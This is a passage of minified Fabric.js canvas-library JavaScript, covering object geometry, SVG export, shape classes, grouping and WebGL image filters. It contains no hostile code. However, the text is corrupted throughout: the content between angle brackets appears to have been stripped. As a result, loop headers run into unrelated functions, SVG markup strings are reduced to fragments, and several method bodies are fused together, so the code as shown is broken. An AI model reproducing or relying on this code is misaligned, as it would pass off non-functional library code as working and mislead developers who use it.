p=this.canvas.vptCoords.tl,D=this.canvas.vptCoords.br;return!!this.intersectsWithRect(p,D,!0,A)||this.getCoords(!0,A).every(function(x){return(x.x>=D.x||x.x<=p.x)&&(x.y>=D.y||x.y<=p.y)})&&this._containsCenterOfCanvas(p,D,A)},_getImageLines:function(A){return{topline:{o:A.tl,d:A.tr},rightline:{o:A.tr,d:A.br},bottomline:{o:A.br,d:A.bl},leftline:{o:A.bl,d:A.tl}}},_findCrossPoints:function(A,p){var w,x,S,O,K,B=0;for(var ee in p)if(!((K=p[ee]).o.y=A.y&&K.d.y>=A.y||(K.o.x===K.d.x&&K.o.x>=A.x?O=K.o.x:(w=(K.d.y-K.o.y)/(K.d.x-K.o.x),x=A.y-0*A.x,S=K.o.y-w*K.o.x,O=-(x-S)/(0-w)),O>=A.x&&(B+=1),2!==B)))break;return B},getBoundingRect:function(A,p){var D=this.getCoords(A,p);return C.makeBoundingBoxFromPoints(D)},getScaledWidth:function(){return this._getTransformedDimensions().x},getScaledHeight:function(){return this._getTransformedDimensions().y},_constrainScale:function(A){return Math.abs(A)\n')}},toSVG:function(b){return this._createBaseSVGMarkup(this._toSVG(b),{reviver:b})},toClipPathSVG:function(b){return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(b),{reviver:b})},_createBaseClipPathSVGMarkup:function(b,_){var y=(_=_||{}).reviver,p=[this.getSvgTransform(!0,_.additionalTransform||""),this.getSvgCommons()].join(""),D=b.indexOf("COMMON_PARTS");return b[D]=p,y?y(b.join("")):b.join("")},_createBaseSVGMarkup:function(b,_){var ee,ve,y=(_=_||{}).noStyle,A=_.reviver,p=y?"":'style="'+this.getSvgStyles()+'" ',D=_.withShadow?'style="'+this.getSvgFilter()+'" ':"",w=this.clipPath,x=this.strokeUniform?'vector-effect="non-scaling-stroke" ':"",S=w&&w.absolutePositioned,O=this.stroke,B=this.fill,K=this.shadow,se=[],le=b.indexOf("COMMON_PARTS"),ye=_.additionalTransform;return w&&(w.clipPathId="CLIPPATH_"+j.Object.__uid++,ve='\n'+w.toClipPathSVG(A)+"\n"),S&&se.push("\n"),se.push("\n"),ee=[p,x,y?"":this.addPaintOrder()," ",ye?'transform="'+ye+'" ':""].join(""),b[le]=ee,B&&B.toLive&&se.push(B.toSVG(this)),O&&O.toLive&&se.push(O.toSVG(this)),K&&se.push(K.toSVG(this)),w&&se.push(ve),se.push(b.join("")),se.push("\n"),S&&se.push("\n"),A?A(se.join("")):se.join("")},addPaintOrder:function(){return"fill"!==this.paintFirst?' paint-order="'+this.paintFirst+'" ':""}})}(),function(){var E=j.util.object.extend,C="stateProperties";function b(y,A,p){var D={};p.forEach(function(x){D[x]=y[x]}),E(y[A],D,!0)}function _(y,A,p){if(y===A)return!0;if(Array.isArray(y)){if(!Array.isArray(A)||y.length!==A.length)return!1;for(var D=0,w=y.length;D=0;w--)if(this.isControlVisible(x=D[w])&&(p=this._getImageLines(b?this.oCoords[x].touchCorner:this.oCoords[x].corner),0!==(A=this._findCrossPoints({x:_,y},p))&&A%2==1))return this.__corner=x,x;return!1},forEachControl:function(C){for(var b in this.controls)C(this.controls[b],b,this)},_setCornerCoords:function(){var C=this.oCoords;for(var b in C){var _=this.controls[b];C[b].corner=_.calcCornerCoords(this.angle,this.cornerSize,C[b].x,C[b].y,!1),C[b].touchCorner=_.calcCornerCoords(this.angle,this.touchCornerSize,C[b].x,C[b].y,!0)}},drawSelectionBackground:function(C){if(!this.selectionBackgroundColor||this.canvas&&!this.canvas.interactive||this.canvas&&this.canvas._activeObject!==this)return this;C.save();var b=this.getCenterPoint(),_=this._calculateCurrentDimensions(),y=this.canvas.viewportTransform;return C.translate(b.x,b.y),C.scale(1/y[0],1/y[3]),C.rotate(E(this.angle)),C.fillStyle=this.selectionBackgroundColor,C.fillRect(-_.x/2,-_.y/2,_.x,_.y),C.restore(),this},drawBorders:function(C,b){b=b||{};var _=this._calculateCurrentDimensions(),y=this.borderScaleFactor,A=_.x+y,p=_.y+y,D=void 0!==b.hasControls?b.hasControls:this.hasControls,w=!1;return C.save(),C.strokeStyle=b.borderColor||this.borderColor,this._setLineDash(C,b.borderDashArray||this.borderDashArray),C.strokeRect(-A/2,-p/2,A,p),D&&(C.beginPath(),this.forEachControl(function(x,S,O){x.withConnection&&x.getVisibility(O,S)&&(w=!0,C.moveTo(x.x*A,x.y*p),C.lineTo(x.x*A+x.offsetX,x.y*p+x.offsetY))}),w&&C.stroke()),C.restore(),this},drawBordersInGroup:function(C,b,_){_=_||{};var y=j.util.sizeAfterTransform(this.width,this.height,b),A=this.strokeWidth,p=this.strokeUniform,D=this.borderScaleFactor,w=y.x+A*(p?this.canvas.getZoom():b.scaleX)+D,x=y.y+A*(p?this.canvas.getZoom():b.scaleY)+D;return C.save(),this._setLineDash(C,_.borderDashArray||this.borderDashArray),C.strokeStyle=_.borderColor||this.borderColor,C.strokeRect(-w/2,-x/2,w,x),C.restore(),this},drawControls:function(C,b){b=b||{},C.save();var y,A,_=this.canvas.getRetinaScaling();return C.setTransform(_,0,0,_,0,0),C.strokeStyle=C.fillStyle=b.cornerColor||this.cornerColor,this.transparentCorners||(C.strokeStyle=b.cornerStrokeColor||this.cornerStrokeColor),this._setLineDash(C,b.cornerDashArray||this.cornerDashArray),this.setCoords(),this.group&&(y=this.group.calcTransformMatrix()),this.forEachControl(function(p,D,w){A=w.oCoords[D],p.getVisibility(w,D)&&(y&&(A=j.util.transformPoint(A,y)),p.render(C,A.x,A.y,b,w))}),C.restore(),this},isControlVisible:function(C){return this.controls[C]&&this.controls[C].getVisibility(this,C)},setControlVisible:function(C,b){return this._controlsVisibility||(this._controlsVisibility={}),this._controlsVisibility[C]=b,this},setControlsVisibility:function(C){for(var b in C||(C={}),C)this.setControlVisible(b,C[b]);return this},onDeselect:function(){},onSelect:function(){}})}(),j.util.object.extend(j.StaticCanvas.prototype,{FX_DURATION:500,fxCenterObjectH:function(E,C){var b=function(){},_=(C=C||{}).onComplete||b,y=C.onChange||b,A=this;return j.util.animate({target:this,startValue:E.left,endValue:this.getCenterPoint().x,duration:this.FX_DURATION,onChange:function(p){E.set("left",p),A.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxCenterObjectV:function(E,C){var b=function(){},_=(C=C||{}).onComplete||b,y=C.onChange||b,A=this;return j.util.animate({target:this,startValue:E.top,endValue:this.getCenterPoint().y,duration:this.FX_DURATION,onChange:function(p){E.set("top",p),A.requestRenderAll(),y()},onComplete:function(){E.setCoords(),_()}})},fxRemove:function(E,C){var b=function(){},_=(C=C||{}).onComplete||b,y=C.onChange||b,A=this;return j.util.animate({target:this,startValue:E.opacity,endValue:0,duration:this.FX_DURATION,onChange:function(p){E.set("opacity",p),A.requestRenderAll(),y()},onComplete:function(){A.remove(E),_()}})}}),j.util.object.extend(j.Object.prototype,{animate:function(){if(arguments[0]&&"object"==typeof arguments[0]){var C,E=[],_=[];for(C in arguments[0])E.push(C);for(var y=0,A=E.length;y-1||A&&y.colorProperties.indexOf(A[1])>-1,D=A?this.get(A[0])[A[1]]:this.get(E);"from"in b||(b.from=D),p||(C=~C.indexOf("=")?D+parseFloat(C.replace("=","")):parseFloat(C));var w={target:this,startValue:b.from,endValue:C,byValue:b.by,easing:b.easing,duration:b.duration,abort:b.abort&&function(x,S,O){return b.abort.call(y,x,S,O)},onChange:function(x,S,O){A?y[A[0]][A[1]]=x:y.set(E,x),!_&&b.onChange&&b.onChange(x,S,O)},onComplete:function(x,S,O){_||(y.setCoords(),b.onComplete&&b.onComplete(x,S,O))}};return p?j.util.animateColor(w.startValue,w.endValue,w.duration,w):j.util.animate(w)}}),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.object.extend,_=C.util.object.clone,y={x1:1,x2:1,y1:1,y2:1};function A(p,D){var w=p.origin,x=p.axis1,S=p.axis2,O=p.dimension,B=D.nearest,K=D.center,ee=D.farthest;return function(){switch(this.get(w)){case B:return Math.min(this.get(x),this.get(S));case K:return Math.min(this.get(x),this.get(S))+.5*this.get(O);case ee:return Math.max(this.get(x),this.get(S))}}}C.Line?C.warn("fabric.Line is already defined"):(C.Line=C.util.createClass(C.Object,{type:"line",x1:0,y1:0,x2:0,y2:0,cacheProperties:C.Object.prototype.cacheProperties.concat("x1","x2","y1","y2"),initialize:function(p,D){p||(p=[0,0,0,0]),this.callSuper("initialize",D),this.set("x1",p[0]),this.set("y1",p[1]),this.set("x2",p[2]),this.set("y2",p[3]),this._setWidthHeight(D)},_setWidthHeight:function(p){p||(p={}),this.width=Math.abs(this.x2-this.x1),this.height=Math.abs(this.y2-this.y1),this.left="left"in p?p.left:this._getLeftToOriginX(),this.top="top"in p?p.top:this._getTopToOriginY()},_set:function(p,D){return this.callSuper("_set",p,D),void 0!==y[p]&&this._setWidthHeight(),this},_getLeftToOriginX:A({origin:"originX",axis1:"x1",axis2:"x2",dimension:"width"},{nearest:"left",center:"center",farthest:"right"}),_getTopToOriginY:A({origin:"originY",axis1:"y1",axis2:"y2",dimension:"height"},{nearest:"top",center:"center",farthest:"bottom"}),_render:function(p){p.beginPath();var D=this.calcLinePoints();p.moveTo(D.x1,D.y1),p.lineTo(D.x2,D.y2),p.lineWidth=this.strokeWidth;var w=p.strokeStyle;p.strokeStyle=this.stroke||p.fillStyle,this.stroke&&this._renderStroke(p),p.strokeStyle=w},_findCenterFromElement:function(){return{x:(this.x1+this.x2)/2,y:(this.y1+this.y2)/2}},toObject:function(p){return b(this.callSuper("toObject",p),this.calcLinePoints())},_getNonTransformedDimensions:function(){var p=this.callSuper("_getNonTransformedDimensions");return"butt"===this.strokeLineCap&&(0===this.width&&(p.y-=this.strokeWidth),0===this.height&&(p.x-=this.strokeWidth)),p},calcLinePoints:function(){var p=this.x1<=this.x2?-1:1,D=this.y1<=this.y2?-1:1;return{x1:p*this.width*.5,x2:p*this.width*-.5,y1:D*this.height*.5,y2:D*this.height*-.5}},_toSVG:function(){var p=this.calcLinePoints();return["\n']}}),C.Line.ATTRIBUTE_NAMES=C.SHARED_ATTRIBUTES.concat("x1 y1 x2 y2".split(" ")),C.Line.fromElement=function(p,D,w){w=w||{};var x=C.parseAttributes(p,C.Line.ATTRIBUTE_NAMES);D(new C.Line([x.x1||0,x.y1||0,x.x2||0,x.y2||0],b(x,w)))},C.Line.fromObject=function(p,D){var x=_(p,!0);x.points=[p.x1,p.y1,p.x2,p.y2],C.Object._fromObject("Line",x,function w(S){delete S.points,D&&D(S)},"points")})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.degreesToRadians;C.Circle?C.warn("fabric.Circle is already defined."):(C.Circle=C.util.createClass(C.Object,{type:"circle",radius:0,startAngle:0,endAngle:360,cacheProperties:C.Object.prototype.cacheProperties.concat("radius","startAngle","endAngle"),_set:function(y,A){return this.callSuper("_set",y,A),"radius"===y&&this.setRadius(A),this},toObject:function(y){return this.callSuper("toObject",["radius","startAngle","endAngle"].concat(y))},_toSVG:function(){var y,D=(this.endAngle-this.startAngle)%360;if(0===D)y=["\n'];else{var w=b(this.startAngle),x=b(this.endAngle),S=this.radius;y=['180?"1":"0")+" 1"," "+C.util.cos(x)*S+" "+C.util.sin(x)*S,'" ',"COMMON_PARTS"," />\n"]}return y},_render:function(y){y.beginPath(),y.arc(0,0,this.radius,b(this.startAngle),b(this.endAngle),!1),this._renderPaintInOrder(y)},getRadiusX:function(){return this.get("radius")*this.get("scaleX")},getRadiusY:function(){return this.get("radius")*this.get("scaleY")},setRadius:function(y){return this.radius=y,this.set("width",2*y).set("height",2*y)}}),C.Circle.ATTRIBUTE_NAMES=C.SHARED_ATTRIBUTES.concat("cx cy r".split(" ")),C.Circle.fromElement=function(y,A){var p=C.parseAttributes(y,C.Circle.ATTRIBUTE_NAMES);if(!function _(y){return"radius"in y&&y.radius>=0}(p))throw new Error("value of `r` attribute is required and can not be negative");p.left=(p.left||0)-p.radius,p.top=(p.top||0)-p.radius,A(new C.Circle(p))},C.Circle.fromObject=function(y,A){C.Object._fromObject("Circle",y,A)})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={});C.Triangle?C.warn("fabric.Triangle is already defined"):(C.Triangle=C.util.createClass(C.Object,{type:"triangle",width:100,height:100,_render:function(b){var _=this.width/2,y=this.height/2;b.beginPath(),b.moveTo(-_,y),b.lineTo(0,-y),b.lineTo(_,y),b.closePath(),this._renderPaintInOrder(b)},_toSVG:function(){var b=this.width/2,_=this.height/2;return["']}}),C.Triangle.fromObject=function(b,_){return C.Object._fromObject("Triangle",b,_)})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=2*Math.PI;C.Ellipse?C.warn("fabric.Ellipse is already defined."):(C.Ellipse=C.util.createClass(C.Object,{type:"ellipse",rx:0,ry:0,cacheProperties:C.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this.set("rx",_&&_.rx||0),this.set("ry",_&&_.ry||0)},_set:function(_,y){switch(this.callSuper("_set",_,y),_){case"rx":this.rx=y,this.set("width",2*y);break;case"ry":this.ry=y,this.set("height",2*y)}return this},getRx:function(){return this.get("rx")*this.get("scaleX")},getRy:function(){return this.get("ry")*this.get("scaleY")},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["\n']},_render:function(_){_.beginPath(),_.save(),_.transform(1,0,0,this.ry/this.rx,0,0),_.arc(0,0,this.rx,0,b,!1),_.restore(),this._renderPaintInOrder(_)}}),C.Ellipse.ATTRIBUTE_NAMES=C.SHARED_ATTRIBUTES.concat("cx cy rx ry".split(" ")),C.Ellipse.fromElement=function(_,y){var A=C.parseAttributes(_,C.Ellipse.ATTRIBUTE_NAMES);A.left=(A.left||0)-A.rx,A.top=(A.top||0)-A.ry,y(new C.Ellipse(A))},C.Ellipse.fromObject=function(_,y){C.Object._fromObject("Ellipse",_,y)})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.object.extend;C.Rect?C.warn("fabric.Rect is already defined"):(C.Rect=C.util.createClass(C.Object,{stateProperties:C.Object.prototype.stateProperties.concat("rx","ry"),type:"rect",rx:0,ry:0,cacheProperties:C.Object.prototype.cacheProperties.concat("rx","ry"),initialize:function(_){this.callSuper("initialize",_),this._initRxRy()},_initRxRy:function(){this.rx&&!this.ry?this.ry=this.rx:this.ry&&!this.rx&&(this.rx=this.ry)},_render:function(_){var y=this.rx?Math.min(this.rx,this.width/2):0,A=this.ry?Math.min(this.ry,this.height/2):0,p=this.width,D=this.height,w=-this.width/2,x=-this.height/2,S=0!==y||0!==A,O=.4477152502;_.beginPath(),_.moveTo(w+y,x),_.lineTo(w+p-y,x),S&&_.bezierCurveTo(w+p-O*y,x,w+p,x+O*A,w+p,x+A),_.lineTo(w+p,x+D-A),S&&_.bezierCurveTo(w+p,x+D-O*A,w+p-O*y,x+D,w+p-y,x+D),_.lineTo(w+y,x+D),S&&_.bezierCurveTo(w+O*y,x+D,w,x+D-O*A,w,x+D-A),_.lineTo(w,x+A),S&&_.bezierCurveTo(w,x+O*A,w+O*y,x,w+y,x),_.closePath(),this._renderPaintInOrder(_)},toObject:function(_){return this.callSuper("toObject",["rx","ry"].concat(_))},_toSVG:function(){return["\n']}}),C.Rect.ATTRIBUTE_NAMES=C.SHARED_ATTRIBUTES.concat("x y rx ry width height".split(" ")),C.Rect.fromElement=function(_,y,A){if(!_)return y(null);A=A||{};var p=C.parseAttributes(_,C.Rect.ATTRIBUTE_NAMES);p.left=p.left||0,p.top=p.top||0,p.height=p.height||0,p.width=p.width||0;var D=new C.Rect(b(A?C.util.object.clone(A):{},p));D.visible=D.visible&&D.width>0&&D.height>0,y(D)},C.Rect.fromObject=function(_,y){return C.Object._fromObject("Rect",_,y)})}(we),function(E){"use strict";var C=E.fabric||(E.fabric={}),b=C.util.object.extend,_=C.util.array.min,y=C.util.array.max,A=C.util.toFixed,p=C.util.projectStrokeOnPoints;C.Polyline?C.warn("fabric.Polyline is already defined"):(C.Polyline=C.util.createClass(C.Object,{type:"polyline",points:null,exactBoundingBox:!1,cacheProperties:C.Object.prototype.cacheProperties.concat("points"),initialize:function(D,w){w=w||{},this.points=D||[],this.callSuper("initialize",w),this._setPositionDimensions(w)},_projectStrokeOnPoints:function(){return p(this.points,this,!0)},_setPositionDimensions:function(D){var x,w=this._calcDimensions(D),S=this.exactBoundingBox?this.strokeWidth:0;this.width=w.width-S,this.height=w.height-S,D.fromSVG||(x=this.translateToGivenOrigin({x:w.left-this.strokeWidth/2+S/2,y:w.top-this.strokeWidth/2+S/2},"left","top",this.originX,this.originY)),void 0===D.left&&(this.left=D.fromSVG?w.left:x.x),void 0===D.top&&(this.top=D.fromSVG?w.top:x.y),this.pathOffset={x:w.left+this.width/2+S/2,y:w.top+this.height/2+S/2}},_calcDimensions:function(){var D=this.exactBoundingBox?this._projectStrokeOnPoints():this.points,w=_(D,"x")||0,x=_(D,"y")||0;return{left:w,top:x,width:(y(D,"x")||0)-w,height:(y(D,"y")||0)-x}},toObject:function(D){return b(this.callSuper("toObject",D),{points:this.points.concat()})},_toSVG:function(){for(var D=[],w=this.pathOffset.x,x=this.pathOffset.y,S=C.Object.NUM_FRACTION_DIGITS,O=0,B=this.points.length;O\n']},commonRender:function(D){var w,x=this.points.length,S=this.pathOffset.x,O=this.pathOffset.y;if(!x||isNaN(this.points[x-1].y))return!1;D.beginPath(),D.moveTo(this.points[0].x-S,this.points[0].y-O);for(var B=0;B"},toObject:function(D){return y(this.callSuper("toObject",D),{path:this.path.map(function(w){return w.slice()})})},toDatalessObject:function(D){var w=this.toObject(["sourcePath"].concat(D));return w.sourcePath&&delete w.path,w},_toSVG:function(){return["\n"]},_getOffsetTransform:function(){var D=C.Object.NUM_FRACTION_DIGITS;return" translate("+p(-this.pathOffset.x,D)+", "+p(-this.pathOffset.y,D)+")"},toClipPathSVG:function(D){var w=this._getOffsetTransform();return"\t"+this._createBaseClipPathSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},toSVG:function(D){var w=this._getOffsetTransform();return this._createBaseSVGMarkup(this._toSVG(),{reviver:D,additionalTransform:w})},complexity:function(){return this.path.length},_calcDimensions:function(){for(var x,ee,D=[],w=[],S=0,O=0,B=0,K=0,se=0,ve=this.path.length;se"},addWithUpdate:function(y){var A=!!this.group;return this._restoreObjectsState(),C.util.resetObjectTransform(this),y&&(A&&C.util.removeTransformFromObject(y,this.group.calcTransformMatrix()),this._objects.push(y),y.group=this,y._set("canvas",this.canvas)),this._calcBounds(),this._updateObjectsCoords(),this.dirty=!0,A?this.group.addWithUpdate():this.setCoords(),this},removeWithUpdate:function(y){return this._restoreObjectsState(),C.util.resetObjectTransform(this),this.remove(y),this._calcBounds(),this._updateObjectsCoords(),this.setCoords(),this.dirty=!0,this},_onObjectAdded:function(y){this.dirty=!0,y.group=this,y._set("canvas",this.canvas)},_onObjectRemoved:function(y){this.dirty=!0,delete y.group},_set:function(y,A){var p=this._objects.length;if(this.useSetOnGroup)for(;p--;)this._objects[p].setOnGroup(y,A);if("canvas"===y)for(;p--;)this._objects[p]._set(y,A);C.Object.prototype._set.call(this,y,A)},toObject:function(y){var A=this.includeDefaultValues,p=this._objects.filter(function(w){return!w.excludeFromExport}).map(function(w){var x=w.includeDefaultValues;w.includeDefaultValues=A;var S=w.toObject(y);return w.includeDefaultValues=x,S}),D=C.Object.prototype.toObject.call(this,y);return D.objects=p,D},toDatalessObject:function(y){var A,p=this.sourcePath;if(p)A=p;else{var D=this.includeDefaultValues;A=this._objects.map(function(x){var S=x.includeDefaultValues;x.includeDefaultValues=D;var O=x.toDatalessObject(y);return x.includeDefaultValues=S,O})}var w=C.Object.prototype.toDatalessObject.call(this,y);return w.objects=A,w},render:function(y){this._transformDone=!0,this.callSuper("render",y),this._transformDone=!1},shouldCache:function(){var y=C.Object.prototype.shouldCache.call(this);if(y)for(var A=0,p=this._objects.length;A\n"],p=0,D=this._objects.length;p\n"),A},getSvgStyles:function(){var A=this.visible?"":" visibility: hidden;";return[void 0!==this.opacity&&1!==this.opacity?"opacity: "+this.opacity+";":"",this.getSvgFilter(),A].join("")},toClipPathSVG:function(y){for(var A=[],p=0,D=this._objects.length;p"},shouldCache:function(){return!1},isOnACache:function(){return!1},_renderControls:function(b,_,y){b.save(),b.globalAlpha=this.isMoving?this.borderOpacityWhenMoving:1,this.callSuper("_renderControls",b,_),void 0===(y=y||{}).hasControls&&(y.hasControls=!1),y.forActiveSelection=!0;for(var A=0,p=this._objects.length;A\n','\t\n',"\n"),w=' clip-path="url(#imageCrop_'+S+')" '}if(this.imageSmoothing||(x='" image-rendering="optimizeSpeed'),_.push("\t\n"),this.stroke||this.strokeDashArray){var O=this.fill;this.fill=null,y=["\t\n'],this.fill=O}return"fill"!==this.paintFirst?b.concat(y,_):b.concat(_,y)},getSrc:function(b){var _=b?this._element:this._originalElement;return _?_.toDataURL?_.toDataURL():this.srcFromAttribute?_.getAttribute("src"):_.src:this.src||""},setSrc:function(b,_,y){return j.util.loadImage(b,function(A,p){this.setElement(A,y),this._setWidthHeight(),_&&_(this,p)},this,y&&y.crossOrigin),this},toString:function(){return'#'},applyResizeFilters:function(){var b=this.resizeFilter,_=this.minimumScaleTrigger,y=this.getTotalObjectScaling(),A=y.scaleX,p=y.scaleY,D=this._filteredEl||this._originalElement;if(this.group&&this.set("dirty",!0),!b||A>_&&p>_)return this._element=D,this._filterScalingX=1,this._filterScalingY=1,this._lastScaleX=A,void(this._lastScaleY=p);j.filterBackend||(j.filterBackend=j.initFilterBackend());var w=j.util.createCanvasElement(),x=this._filteredEl?this.cacheKey+"_filtered":this.cacheKey,S=D.width,O=D.height;w.width=S,w.height=O,this._element=w,this._lastScaleX=b.scaleX=A,this._lastScaleY=b.scaleY=p,j.filterBackend.applyFilters([b],D,S,O,this._element,x),this._filterScalingX=w.width/this._originalElement.width,this._filterScalingY=w.height/this._originalElement.height},applyFilters:function(b){if(b=(b=b||this.filters||[]).filter(function(D){return D&&!D.isNeutralState()}),this.set("dirty",!0),this.removeTexture(this.cacheKey+"_filtered"),0===b.length)return this._element=this._originalElement,this._filteredEl=null,this._filterScalingX=1,this._filterScalingY=1,this;var _=this._originalElement,y=_.naturalWidth||_.width,A=_.naturalHeight||_.height;if(this._element===this._originalElement){var p=j.util.createCanvasElement();p.width=y,p.height=A,this._element=p,this._filteredEl=p}else this._element=this._filteredEl,this._filteredEl.getContext("2d").clearRect(0,0,y,A),this._lastScaleX=1,this._lastScaleY=1;return j.filterBackend||(j.filterBackend=j.initFilterBackend()),j.filterBackend.applyFilters(b,this._originalElement,y,A,this._element,this.cacheKey),(this._originalElement.width!==this._element.width||this._originalElement.height!==this._element.height)&&(this._filterScalingX=this._element.width/this._originalElement.width,this._filterScalingY=this._element.height/this._originalElement.height),this},_render:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),!0!==this.isMoving&&this.resizeFilter&&this._needsResize()&&this.applyResizeFilters(),this._stroke(b),this._renderPaintInOrder(b)},drawCacheOnCanvas:function(b){j.util.setImageSmoothing(b,this.imageSmoothing),j.Object.prototype.drawCacheOnCanvas.call(this,b)},shouldCache:function(){return this.needsItsOwnCache()},_renderFill:function(b){var _=this._element;if(_){var y=this._filterScalingX,A=this._filterScalingY,p=this.width,D=this.height,w=Math.min,x=Math.max,S=x(this.cropX,0),O=x(this.cropY,0),B=_.naturalWidth||_.width,K=_.naturalHeight||_.height,ee=S*y,se=O*A,ve=w(p*y,B-ee),le=w(D*A,K-se),ye=-p/2,z=-D/2,l=w(p,B/y-S),f=w(D,K/A-O);_&&b.drawImage(_,ee,se,ve,le,ye,z,l,f)}},_needsResize:function(){var b=this.getTotalObjectScaling();return b.scaleX!==this._lastScaleX||b.scaleY!==this._lastScaleY},_resetWidthHeight:function(){this.set(this.getOriginalSize())},_initElement:function(b,_){this.setElement(j.util.getById(b),_),j.util.addClass(this.getElement(),j.Image.CSS_CANVAS)},_initConfig:function(b){b||(b={}),this.setOptions(b),this._setWidthHeight(b)},_initFilters:function(b,_){b&&b.length?j.util.enlivenObjects(b,function(y){_&&_(y)},"fabric.Image.filters"):_&&_()},_setWidthHeight:function(b){b||(b={});var _=this.getElement();this.width=b.width||_.naturalWidth||_.width||0,this.height=b.height||_.naturalHeight||_.height||0},parsePreserveAspectRatioAttribute:function(){var O,b=j.util.parsePreserveAspectRatioAttribute(this.preserveAspectRatio||""),_=this._element.width,y=this._element.height,A=1,p=1,D=0,w=0,x=0,S=0,B=this.width,K=this.height,ee={width:B,height:K};return!b||"none"===b.alignX&&"none"===b.alignY?(A=B/_,p=K/y):("meet"===b.meetOrSlice&&(O=(B-_*(A=p=j.util.findScaleToFit(this._element,ee)))/2,"Min"===b.alignX&&(D=-O),"Max"===b.alignX&&(D=O),O=(K-y*p)/2,"Min"===b.alignY&&(w=-O),"Max"===b.alignY&&(w=O)),"slice"===b.meetOrSlice&&(O=_-B/(A=p=j.util.findScaleToCover(this._element,ee)),"Mid"===b.alignX&&(x=O/2),"Max"===b.alignX&&(x=O),O=y-K/p,"Mid"===b.alignY&&(S=O/2),"Max"===b.alignY&&(S=O),_=B/A,y=K/p)),{width:_,height:y,scaleX:A,scaleY:p,offsetLeft:D,offsetTop:w,cropX:x,cropY:S}}}),j.Image.CSS_CANVAS="canvas-img",j.Image.prototype.getSvgSrc=j.Image.prototype.getSrc,j.Image.fromObject=function(b,_){var y=j.util.object.clone(b);j.util.loadImage(y.src,function(A,p){p?_&&_(null,!0):j.Image.prototype._initFilters.call(y,y.filters,function(D){y.filters=D||[],j.Image.prototype._initFilters.call(y,[y.resizeFilter],function(w){y.resizeFilter=w[0],j.util.enlivenObjectEnlivables(y,y,function(){var x=new j.Image(A,y);_(x,!1)})})})},null,y.crossOrigin)},j.Image.fromURL=function(b,_,y){j.util.loadImage(b,function(A,p){_&&_(new j.Image(A,y),p)},null,y&&y.crossOrigin)},j.Image.ATTRIBUTE_NAMES=j.SHARED_ATTRIBUTES.concat("x y width height preserveAspectRatio xlink:href crossOrigin image-rendering".split(" ")),j.Image.fromElement=function(b,_,y){var A=j.parseAttributes(b,j.Image.ATTRIBUTE_NAMES);j.Image.fromURL(A["xlink:href"],_,C(y?j.util.object.clone(y):{},A))})}(we),j.util.object.extend(j.Object.prototype,{_getAngleValueForStraighten:function(){var E=this.angle%360;return E>0?90*Math.round((E-1)/90):90*Math.round(E/90)},straighten:function(){return this.rotate(this._getAngleValueForStraighten())},fxStraighten:function(E){var C=function(){},b=(E=E||{}).onComplete||C,_=E.onChange||C,y=this;return j.util.animate({target:this,startValue:this.get("angle"),endValue:this._getAngleValueForStraighten(),duration:this.FX_DURATION,onChange:function(A){y.rotate(A),_()},onComplete:function(){y.setCoords(),b()}})}}),j.util.object.extend(j.StaticCanvas.prototype,{straightenObject:function(E){return E.straighten(),this.requestRenderAll(),this},fxStraightenObject:function(E){return E.fxStraighten({onChange:this.requestRenderAllBound})}}),function(){"use strict";function E(b,_){var y="precision "+_+" float;\nvoid main(){}",A=b.createShader(b.FRAGMENT_SHADER);return b.shaderSource(A,y),b.compileShader(A),!!b.getShaderParameter(A,b.COMPILE_STATUS)}function C(b){b&&b.tileSize&&(this.tileSize=b.tileSize),this.setupGLContext(this.tileSize,this.tileSize),this.captureGPUInfo()}j.isWebglSupported=function(b){if(j.isLikelyNode)return!1;b=b||j.WebglFilterBackend.prototype.tileSize;var _=document.createElement("canvas"),y=_.getContext("webgl")||_.getContext("experimental-webgl"),A=!1;if(y){j.maxTextureSize=y.getParameter(y.MAX_TEXTURE_SIZE),A=j.maxTextureSize>=b;for(var p=["highp","mediump","lowp"],D=0;D<3;D++)if(E(y,p[D])){j.webGlPrecision=p[D];break}}return this.isSupported=A,A},j.WebglFilterBackend=C,C.prototype={tileSize:2048,resources:{},setupGLContext:function(b,_){this.dispose(),this.createWebGLCanvas(b,_),this.aPosition=new Float32Array([0,0,0,1,1,0,1,1]),this.chooseFastestCopyGLTo2DMethod(b,_)},chooseFastestCopyGLTo2DMethod:function(b,_){var A,y=void 0!==window.performance;try{new ImageData(1,1),A=!0}catch(ee){A=!1}var p="undefined"!=typeof ArrayBuffer,D="undefined"!=typeof Uint8ClampedArray;if(y&&A&&p&&D){var w=j.util.createCanvasElement(),x=new ArrayBuffer(b*_*4);if(j.forceGLPutImageData)return this.imageBuffer=x,void(this.copyGLTo2D=U);var O,B,S={imageBuffer:x,destinationWidth:b,destinationHeight:_,targetCanvas:w};w.width=b,w.height=_,O=window.performance.now(),$.call(S,this.gl,S),B=window.performance.now()-O,O=window.performance.now(),U.call(S,this.gl,S),B>window.performance.now()-O?(this.imageBuffer=x,this.copyGLTo2D=U):this.copyGLTo2D=$}},createWebGLCanvas:function(b,_){var y=j.util.createCanvasElement();y.width=b,y.height=_;var A={alpha:!0,premultipliedAlpha:!1,depth:!1,stencil:!1,antialias:!1},p=y.getContext("webgl",A);p||(p=y.getContext("experimental-webgl",A)),p&&(p.clearColor(0,0,0,0),this.canvas=y,this.gl=p)},applyFilters:function(b,_,y,A,p,D){var x,w=this.gl;D&&(x=this.getCachedTexture(D,_));var S={originalWidth:_.width||_.originalWidth,originalHeight:_.height||_.originalHeight,sourceWidth:y,sourceHeight:A,destinationWidth:y,destinationHeight:A,context:w,sourceTexture:this.createTexture(w,y,A,!x&&_),targetTexture:this.createTexture(w,y,A),originalTexture:x||this.createTexture(w,y,A,!x&&_),passes:b.length,webgl:!0,aPosition:this.aPosition,programCache:this.programCache,pass:0,filterBackend:this,targetCanvas:p},O=w.createFramebuffer();return w.bindFramebuffer(w.FRAMEBUFFER,O),b.forEach(function(B){B&&B.applyTo(S)}),function I(E){var 